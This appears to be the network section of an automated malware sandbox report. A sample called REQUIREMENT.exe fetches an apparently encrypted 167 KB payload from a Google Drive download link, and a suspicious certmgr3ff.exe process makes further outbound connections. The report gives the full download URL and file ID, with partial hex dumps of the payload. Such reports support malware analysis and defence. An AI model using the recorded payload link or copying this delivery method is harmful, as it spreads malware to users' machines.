Oct 13, 2021 15:54:57.196270943 CEST	8961	IN	Data Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49830	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49831	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49832	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49790	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:47:08 UTC	0	OUT	GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-10-13 13:47:09 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 13:47:09 GMT Location: https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra59sspsgplogf893q75230rnc/1634132775000/18281895610876391208/*/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-Zd0nUPdqBPohAFIv0ZtgBA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs; expires=Thu, 14-Apr-2022 13:47:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-13 13:47:09 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 37 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 32 31 6c 74 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt
2021-10-13 13:47:09 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49791	142.250.185.161	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:47:09 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra59sspsgplogf893q75230rnc/1634132775000/18281895610876391208/*/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-04-7g-docs.googleusercontent.com Connection: Keep-Alive
2021-10-13 13:47:09 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdsZtaLcJ8hGo8qcwSDJ-xExkMap9NyhKY9cMlbdL0fb4qve8azeKEXZH4BEJ5byB4dHVdhQ-X2CqlilyYT9n97-T4B5pw Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="oodf_BKGjFlg78.bin";filename*=UTF-8''oodf_BKGjFlg78.bin Content-Length: 167488 Date: Wed, 13 Oct 2021 13:47:09 GMT Expires: Wed, 13 Oct 2021 13:47:09 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=vfJ+GA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-13 13:47:09 UTC	5	IN	Data Raw: 65 52 7e c8 bd a3 0c da 73 13 7c 05 bd d9 28 7e 01 64 b8 3b d0 7f cf 51 dc 99 26 b0 eb ac cf 92 82 64 85 80 cd 09 5e 97 32 4d b0 fe 61 76 2c 1c a4 43 39 fd ca da b2 10 64 8a d1 0b e2 e5 22 41 1e 9e ae aa d8 33 a2 91 7e 77 df eb ce 32 3f 1b 1c 86 1b 1d da b0 73 bb 59 6e fa b4 9e 1e 44 82 f0 bf 66 2d 31 ac 52 5c 11 c5 ed a0 44 29 ce cf 6d fb 36 fe 18 a0 75 ad 72 cc b9 38 89 d5 64 24 21 bb 57 af fa 24 b9 06 26 c9 54 ef 89 9d b7 c7 de ac 3e 80 fc 08 54 57 6f 1d 8d 38 07 23 74 46 df 44 6e 91 c0 33 65 b3 44 e2 46 67 02 b0 f2 c3 cf 73 0b 2f d5 83 56 1a f6 d7 f4 b3 4a 27 71 a1 74 94 84 e8 93 3c 19 40 3a 2d f9 f6 27 c7 2e 7c 02 99 fc 00 74 3b 28 37 cd 38 37 89 ab d1 29 78 ef 25 ce b4 8e d0 93 db c6 82 0e 22 88 ec 54 77 4e be e0 bc a6 2d c1 c9 2a 8c 0d 0e 87 f7 3d Data Ascii: eR~s\|(~d;Q&d^2Mav,C9d"A3~w2?sYnDf-1R\D)m6ur8d$!W$&T>TWo8#tFDn3eDFgs/VJ'qt<@:-'.\|t;(787)x%"TwN-*=
2021-10-13 13:47:09 UTC	9	IN	Data Raw: c7 5f af fe 16 5f d2 f1 a9 7b 85 d2 ab 36 1f fc 8a 9e 41 d8 07 7c de c7 c0 91 53 d7 0f 78 27 d3 56 e8 30 5a da a9 b1 42 2e 02 52 bf 4d 4e 18 3e 28 7b 56 e8 19 ee d7 68 da 79 dc 56 90 53 b5 06 73 25 38 a5 b4 99 f6 09 ef 5b e3 05 c4 86 96 26 2d 76 37 2d b6 e3 32 e0 68 ed 3e b9 52 40 92 33 80 54 f8 c7 04 f6 6a e1 82 13 18 10 40 0e 19 8b f3 48 91 e4 1c 25 ba e1 43 80 83 71 6a d7 c0 bf 35 15 7e 8a 70 e4 3c 91 cc 96 16 32 0f 51 f4 28 ba 9c d5 9f f4 69 2f 47 12 fa 7b 6a ef 9f 3f dc dd 42 83 fb 6f b1 8d b3 2c 15 ad ee b2 03 33 72 6f b7 85 0b 3e 57 17 92 90 06 19 54 24 41 dd 5d 43 54 12 7c 7f c8 1d b7 a7 ca ed 76 c3 09 5f a7 e3 85 d5 b6 d5 35 ac a2 c8 14 e2 85 51 cd 10 11 63 0e 5b f2 5c 66 43 f1 d9 25 87 23 4b c4 28 11 7f a5 1a 1d 17 b1 ac 3e 9b 2b 66 27 b2 43 72 Data Ascii: __{6A\|Sx'V0ZB.RMN>({VhyVSs%8[&-v7-2h>R@3Tj@H%Cqj5~p<2Q(i/G{j?Bo,3ro>WT$A]CT\|v_5Qc[\fC%#K(>+f'Cr
2021-10-13 13:47:09 UTC	13	IN	Data Raw: 53 6d a5 9b c1 22 c6 c5 04 18 ae 8f e2 79 b7 56 4e a1 e9 b2 2e 7c 0c 80 32 12 f2 b8 d4 e5 32 86 9b a2 64 ec 52 3b 44 1d 0f b0 f5 44 be f5 93 2c c8 30 13 cf ef af f4 74 f7 b3 53 08 7a 3a c1 4d a8 d6 10 86 5a 6b 05 4c 74 1b 10 04 86 8a 86 3c 85 5d e7 4e 96 5a 9e ff 4e 97 f9 4e 71 fa 82 6e 88 98 94 f7 98 69 96 cc 46 d8 b6 86 d7 c5 e0 74 49 ca 31 1d 8e d2 e1 4d 46 77 c8 f5 31 02 b4 f8 db 7d 41 db f4 3e 53 80 fb 77 5a 15 70 24 8e 4f 55 47 c1 85 17 e6 4b cb c6 1f f8 48 94 91 b2 9b b2 88 28 74 e3 20 42 bf ae 0d e5 1b d8 49 90 c9 15 ba b4 05 af 88 ec b0 61 6a dc a0 2e fc 18 4b ad f7 46 16 fd f7 d4 19 48 48 a7 8e e4 99 1a 6b 2c ab 7f ff 9e d5 a1 8e bb 4b d2 22 ff d1 da 16 0c 56 84 e1 07 7e 87 d8 79 42 63 be 27 d5 32 90 5b 07 14 9f 2a f0 87 c7 7a ff a1 f7 df 0a 54 Data Ascii: Sm"yVN.\|22dR;DD,0tSz:MZkLt<]NZNNqniFtI1MFw1}A>SwZp$OUGKH(t BIaj.KFHHk,K"V~yBc'2[*zT
2021-10-13 13:47:09 UTC	16	IN	Data Raw: 30 15 d6 7b 66 ff 48 20 e1 9c fe 2f 63 e2 8b 24 52 a4 99 b0 f7 90 71 a3 89 ac 1f be ef 83 71 cd 7f 80 c3 a3 5e 1c 5d bb e2 d7 7f 49 de 70 2d 28 0b 23 92 8c 71 66 8c 96 44 0c 55 b7 f4 db 09 ed 2d d6 e1 3f 80 c3 c4 5b 03 8f 84 50 86 80 10 1a 4b 84 97 11 fd 40 32 40 fd 2c 9a c9 4d 54 11 9f 92 b5 4e 21 3a 30 4c 79 65 c4 59 d2 3e 08 d5 74 0e c9 4e 8a c3 a3 b6 e9 be e3 78 8e 19 e1 58 bc b8 d2 e6 5e 7a c9 47 5d b7 61 3e c4 2f 41 cd 14 9a 38 86 74 63 2f 59 62 9b c1 8b f5 3c 6e e5 85 a0 33 f7 37 dd fb 4e a6 ed 7e a8 44 bd 6d f3 40 f1 27 42 44 f9 18 ba 8e f6 db fe b4 7a 08 31 e8 6d b5 50 3f 54 41 6c 8b 98 a0 93 93 4b 3a df 79 fa c6 86 6f 19 65 7f ea 76 83 78 59 d7 fb 98 81 29 04 03 fd 8f 22 b5 32 64 eb 6e ce 17 35 a4 54 5c fc 2a 48 2a 6e d0 91 70 d9 9f 51 a2 bf 65 Data Ascii: 0{fH /c$Rqq^]Ip-(#qfDU-?[PK@2@,MTN!:0LyeY>tNxX^zG]a>/A8tc/Yb<n37N~Dm@'BDz1mP?TAlK:yoevxY)"2dn5T\HnpQe
2021-10-13 13:47:09 UTC	18	IN	Data Raw: 15 84 78 41 90 9a 02 f6 47 26 04 7a d5 b6 d5 06 f0 1a cc 9f 9f 79 62 94 08 d0 9c 06 d2 af a8 ed 1e 01 18 de 97 a2 ac 3b 28 11 7f 2e 66 a5 13 30 4f c1 9b 2b 66 ac ee db 76 5b a8 f7 d8 64 2f 60 62 40 0a 44 2c 98 ba b7 2c 18 b4 d0 d9 63 ff fb c7 d1 dc d8 99 13 39 cb 2b 23 72 81 2f 5c 03 f4 c5 6f 9c 5f 7b b0 2e a0 8d 79 06 89 e6 8f 43 ae 71 0b 0b 8d b7 69 a9 49 ae 52 5c fa c3 60 3b 44 29 ce cf e6 86 c2 3f e7 a8 f4 4a 8d cc b9 38 ba a9 dc 20 ee 6b fd 2a 24 51 4b db 86 92 aa a3 44 bc 68 f3 2f db df 3b 86 54 c8 ae 53 88 2c b8 99 4d 1a 29 20 38 94 f0 21 82 18 ee 9f 00 f2 86 bd e7 20 00 5d 1c 6f 4a c8 f2 c3 14 59 8a 00 80 73 e6 8a b1 80 8f 4b 78 d7 c3 89 f7 0b ab 4f 41 1e c0 7f bf 5c bb 02 89 ce 2c f8 9c 10 a2 f8 c1 1a 8a e0 34 0c 74 0a cf 4d 5c 18 12 77 14 6d 4a Data Ascii: xAG&zyb;(.f0O+fv[d/`b@D,,c9+#r/\o_{.yCqiIR\`;D)?J8 k*$QKDh/;TS,M) 8! ]oJYsKxOA\,4tM\wmJ
2021-10-13 13:47:09 UTC	19	IN	Data Raw: f7 80 a6 a4 33 af d1 82 73 7a 5c c8 f2 0d e5 e0 f3 46 97 e5 b6 52 27 9d 1b b5 69 14 69 36 ac 82 d2 00 53 5d 37 c8 82 0c fb 0f 46 c9 1e cf 68 a3 38 fb 78 28 4f bb 83 02 fe 0b 83 ff 70 dd b1 dd 6a b8 1f 09 d3 58 b5 62 85 f4 07 11 4c b3 f9 75 63 53 85 a7 9a 84 6d c2 c6 37 1f 7f 4e 9a c4 18 73 76 b8 44 fc d7 0f a3 0c 30 52 25 1e 9c 3b 3c 59 95 f7 1e 5a 06 15 f7 38 bb 9d fe 5c 62 d3 17 6d fb 5a 64 e5 28 51 02 d6 51 3e 43 7b 77 68 4d 53 f0 f7 09 6c 9f ef 5a 9a db 55 73 a6 9a b4 c1 86 d1 f2 b6 e3 98 32 31 17 ac 1a 76 7c dc bd 33 6e f4 e7 a4 7a 43 4e d7 05 e6 21 8b f3 48 56 a1 e4 14 8a e1 43 47 c6 a9 58 e7 f1 8d 53 d2 3b 56 70 e4 fb d4 1c a4 26 03 39 37 33 6d 6e 9c d5 58 b1 99 18 47 12 fa bc 2f 0f ad 0f ec e5 24 44 be 8b b1 8d 5b ef 65 ac ee 31 c7 3f f7 af c3 8f Data Ascii: 3sz\FR'ii6S]7Fh8x(OpjXbLucSm7NsvD0R%;<YZ8\bmZd(QQ>C{whMSlZUs21v\|3nzCN!HVCGXS;Vp&973mnXG/$D[e1?
2021-10-13 13:47:09 UTC	20	IN	Data Raw: f5 76 c9 e1 59 77 53 8a 01 10 6d da 18 5f 3a be 0d 69 19 ec 08 66 b5 2d c1 4a be c5 52 50 90 7d d9 01 8a 6b 54 5b 66 63 d1 24 86 7a f9 7b 40 79 ff 86 a3 45 55 23 bb 43 3c 4b fe 25 a2 f6 47 8c 81 9e 7b 4d 75 5f 1d 59 cb 88 2e 9f 6a 8f d1 e7 05 ff 88 c7 36 88 1a 76 86 d7 90 d7 d1 f0 7a d4 ee 50 30 73 ec aa ba 35 d2 4a 46 76 6f 97 48 54 08 36 55 0e ba b8 fc 80 8c e5 2b 89 44 fb 50 bd 77 3c f6 fa 49 a9 fb 76 a0 b7 a0 31 38 68 1b 04 48 67 82 cc bd 91 9a 09 d1 0d b9 fd f1 4c 15 09 9b 99 b1 91 04 16 eb 99 75 6a 30 82 15 7b fc f6 18 63 0a 6c 61 04 be 3f e8 fa 2d 09 8b 83 e6 3a 61 e8 fd 15 44 c3 8d 4b 8c 5c 3f 84 14 11 03 ef fb 2a 0e 2e 7c cc 9a e9 44 7f 85 61 1b 91 0f 4d 0a 0c 68 0a 94 fa 80 5e de 0f 2d eb 5c ce 00 c4 ad f8 7c 5d e3 9f ba a4 8a 70 3d c6 6e 75 a1 Data Ascii: vYwSm_:if-JRP}kT[fc$z{@yEU#C<K%G{Mu_Y.j6vzP0s5JFvoHT6U+DPw<Iv18hHgLuj0{cla?-:aDK\?*.\|DaMh^-\\|]p=nu
2021-10-13 13:47:09 UTC	22	IN	Data Raw: 2d e5 aa 2e 17 ad 63 37 73 c6 8d 90 e7 08 46 a6 06 41 7a 04 75 19 54 a7 85 fd d8 83 20 7a f1 2a 24 4f 3c f2 52 85 76 c2 09 5f 2a 66 f5 2e 49 2a 65 c6 a3 45 59 7e d4 03 9b f8 fc 21 0f 5b 71 98 7a c6 31 ac 64 0c a6 33 3f d7 ee f2 29 1f 6d ec 4e 53 6f c8 c3 a4 45 b3 43 ff 0e 5f 43 9d af 27 d0 5d cf 05 40 2f 1d 44 b7 a7 9d 47 77 be 98 b3 b4 ca 92 dc ac 3b ba 75 a5 4b 5f 6e 81 7d b4 6b a1 b8 f7 1b 18 aa 1d 98 a1 8c 0f 84 21 3a 1a 93 8a 71 bb 01 34 b7 e5 53 2d ac db da 95 ce ed a0 2e 29 ba c9 e0 b6 c6 af f3 a4 f8 f8 8a 9e ea d0 a6 b6 65 24 ac 60 e1 cb fe f8 b0 fb 07 71 3d a3 00 a3 e3 c5 b7 89 f6 10 d0 66 33 4f 0a 18 ad 6b 66 4d 72 29 ef 7b 0c 9e e0 17 99 5b 58 80 28 47 ae 39 ff e2 a2 9f ab 62 78 30 67 1b d2 d7 f4 3a cc 67 7a a1 09 fd 3f 95 ab 3b 48 8d c3 25 2c Data Ascii: -.c7sFAzuT z$O<Rv_f.I*eEY~![qz1d3?)mNSoEC_C']@/DGw;uK_n}k!:q4S-.)e$`q=f3OkfMr){[X(G9bx0g:gz?;H%,
2021-10-13 13:47:09 UTC	23	IN	Data Raw: ab 16 5d b3 9a 38 f3 6f 34 9c 1e b1 8d ed ed 81 53 a6 4a 5e 34 52 25 76 76 cf 46 0b 63 de cb 0f 3c eb 86 be 08 ea bd e7 9e 25 92 a8 16 b7 05 df 04 e4 bf a0 32 1c fd 8e f6 79 45 34 d7 ff e7 5f 99 c9 56 c5 9e e4 3b 1c 79 4f 69 89 11 37 d8 1c 19 07 53 df 79 29 32 6c a2 55 1c d1 ce dd 79 33 19 31 0d 60 1c c7 a5 3b db 96 98 61 79 3b 5c af fe 61 60 82 7c 3c db 7e 2d 54 61 4d 14 38 c4 40 d8 84 b8 d2 4a 95 71 de 52 af 83 d8 2c ef fc 34 5a da fb 38 1f ce c5 17 5b 4e 4e 18 3e a1 3e be 61 44 02 b1 e1 97 89 55 0b 62 da e8 f0 fa 78 c2 5a 62 c7 a9 52 64 be be c6 01 57 31 8f eb 84 23 01 ac 78 67 6b 84 6e d2 91 04 cb e7 3b 0b d2 58 cc 04 f6 3d d2 7d 7b ef 4e 54 c2 4e dc a3 c5 df f8 4d ac c7 11 ca fd 77 99 9c 20 c0 bf b6 d1 6a 03 35 18 07 56 b9 9e 49 01 cf 0f 7f cd e7 5f Data Ascii: ]8o4SJ^4R%vvFc<%2yE4_V;yOi7Sy)2lUy31`;ay;\a`\|<~-TaM8@JqR,4Z8[NN>>aDUbxZbRdW1#xgkn;X=}{NTNMw j5VI_
2021-10-13 13:47:09 UTC	24	IN	Data Raw: e0 34 55 71 f2 de f3 cc b2 1d f0 c4 aa 00 17 1e c0 7e 34 20 03 c1 c8 15 1c 79 7f ed a2 f8 c1 fb d2 f5 b5 55 41 fd 03 e6 81 2a 4e c7 eb 6d 20 b1 66 48 c3 1f 33 75 24 58 d2 3e 9b 92 f2 57 0f cb 9c 34 36 4c 00 7f 2e 13 49 53 d7 a2 ae 6d a3 71 96 73 1e de 7e a2 f7 93 e3 e0 b2 02 57 c9 38 92 7a 28 36 a9 61 da 03 f5 06 2d 4d 22 aa 34 59 1f f2 08 b1 86 a6 f1 78 60 fd 92 d5 36 5d 84 92 2c e9 bd 35 43 53 e6 aa 39 a6 88 fd 24 c2 e4 72 7f 97 51 e3 59 d3 d4 3d d7 16 bc 84 c4 e8 34 8e 92 9e df d1 47 2c 06 7d 2f e0 82 26 58 e2 c7 d5 90 55 a0 22 5c 4b a9 32 5e 01 0d ab 03 8d f4 cf ed 56 65 03 8a 95 ca 4b d6 12 56 bd 1f 7e 4d 60 fa fd a0 bd f5 93 63 94 b3 91 24 61 2f 09 02 8e 58 11 41 e8 15 a7 27 55 29 6c 48 4c e8 c9 ff ba f9 ad 76 2c 7a c8 18 9f 72 fd 97 6a a5 52 db 42 Data Ascii: 4Uq~4 yUA*Nm fH3u$X>W46L.ISmqs~W8z(6a-M"4Yx`6],5CS9$rQY=4G,}/&XU"\K2^VeKV~M`c$a/XA'U)lHLv,zrjRB
2021-10-13 13:47:09 UTC	25	IN	Data Raw: 46 b5 b1 c4 0a c4 d1 77 03 0d f4 28 ba 5b 90 23 da 69 4a 47 d5 bf bb 12 ef fa 3f ba 54 0f 47 13 30 e0 8c b3 1f dc c7 d8 e3 8e 66 f4 3d 70 00 77 c1 a8 e8 bc 90 62 19 93 61 c1 b1 5d 2f 54 74 f5 32 4c f5 8b f6 cb ed fb 87 32 a0 24 27 b9 55 8e e4 40 c4 64 c8 14 5b 84 51 cd 10 91 5b 20 2f b5 1d 2e c0 08 d7 57 73 75 21 cc a5 54 c3 f5 97 90 6b 4e 53 c1 ca c3 ff 74 b3 43 f1 5e 6b 6e 5c 53 a2 93 ed b3 ef a9 ad 7b 45 3a 58 07 c0 01 da 67 3e 38 cf 68 29 d7 0d 9f b9 b0 ca 98 e5 42 6f 12 80 3f f9 85 76 37 ef bb e4 54 75 ef 2b fc 20 4e 1a 97 b3 13 83 f0 3c a2 25 da 00 df c9 61 3a 12 5f 17 7b 26 a4 20 fa 36 7d dc a8 f0 6d 07 54 e6 80 35 d5 64 24 74 2f 08 fc 39 1d f8 34 8c 86 7e 5a 15 bf 18 22 22 6f e3 0f 71 4c c3 72 5c b6 a9 45 66 a5 16 79 aa 64 8f 30 ec ca ee 56 11 83 Data Ascii: Fw([#iJG?TG0f=pwba]/Tt2L2$'U@d[Q[ /.Wsu!TkNStC^kn\S{E:Xg>8h)Bo?v7Tu+ N<%a:_{& 6}mT5d$t/94~Z""oqLr\Efyd0V
2021-10-13 13:47:09 UTC	27	IN	Data Raw: 76 f4 8e 59 e7 32 cb 04 4b 7c 4d 5d 4b 13 cb cc 1c 9c 91 80 6e 25 93 be 4a f7 51 ec db 7f 0f 16 65 81 7e a6 4c 33 3a 30 e1 71 3d 1d 09 ef fb 4c 69 47 7b 17 55 b9 1f 06 d8 79 1b 6e 0b 21 b9 48 bc 49 97 14 bb 40 29 70 20 82 f8 f4 50 48 b7 05 b4 ab f6 07 f2 f4 27 56 27 e1 8d 55 bf 9c 75 17 5f 99 e9 07 36 67 cd bf b2 f7 c2 01 ff 63 6a 72 0b 30 7b 92 8c 42 4f 36 bc d2 fc 6e ab 4e 74 dd cd 49 8e 21 93 40 c6 28 b5 73 ee a3 8e 15 91 b7 a8 0e e9 a0 84 19 68 8a 7a 2d 28 f2 3b cf 4a c0 ca 3d 5a bf 3d 03 c5 19 08 eb 32 2d ac 3f 01 63 4d 52 51 2e 69 45 2e 02 d7 7f 39 38 4e b3 98 7b 76 e8 19 65 50 04 d1 79 dc db d8 52 3c 89 1f 2e 38 a5 37 61 e6 7f c2 d8 9d 55 c4 f2 b1 70 7a 9e e0 2a b6 e3 b1 24 60 6e 80 11 db 40 92 33 f4 40 ae 90 c3 70 c2 68 82 13 18 10 40 0e f1 51 f1 Data Ascii: vY2K\|M]Kn%JQe~L3:0q=LiG{Uyn!HI@)p PH'V'Uu_6gcjr0{BO6nNtI!@(shz-(;J=Z=2-?cMRQ.iE.98N{vePyR<.87aUpz*$`n@3@ph@Q
2021-10-13 13:47:09 UTC	28	IN	Data Raw: 65 8d 4a a4 3e 9c f1 0b 1f 16 42 35 d7 c2 29 47 cb 7b e4 1b 5f e3 90 c9 3f 8a 0b f8 61 91 f5 b3 c1 b4 75 ac 09 f2 38 37 a6 51 48 85 8e d2 55 41 e1 91 80 e6 4a 03 6c 52 80 fa 95 f5 ef a2 ae 92 79 e8 98 30 cd 3c c6 ec 41 0f d9 53 cb 1c b5 14 ea 60 e0 62 8d ec 2c ad 3e 82 96 03 e4 84 a3 62 cb 7f 2c 09 c2 04 2c 85 0f 4d 5c 61 34 a6 dc 9b a2 a5 fe 8b 20 81 5d f1 74 c8 b6 b0 02 da de c3 0e 89 d7 c9 2a aa 5a 50 1e 59 48 cf 9c 3c 38 d4 5a 02 57 b8 ff 3c 0f 87 1c 12 72 25 6f 5c 84 f7 a8 64 be b8 fd fc 52 a6 34 f1 de 15 17 a9 3e 70 15 97 b0 8b 02 06 e0 41 b6 39 53 84 cb 3b 75 74 7a 39 74 1d 78 c7 c4 47 aa 20 a7 b1 50 d7 4e 20 3c 52 2e ee 8c a6 54 4e 65 e1 27 b3 ba 89 79 50 41 84 ee e6 84 be 98 56 db 99 10 6d 25 f3 b2 97 8a 8f c7 10 58 84 eb 87 3b 07 85 ef c3 f4 74 Data Ascii: eJ>B5)G{_?au87QHUAJlRy0<AS`b,>b,,M\a4 ]t*ZPYH<8ZW<r%o\dR4>pA9S;utz9txG PN <R.TNe'yPAVm%X;t
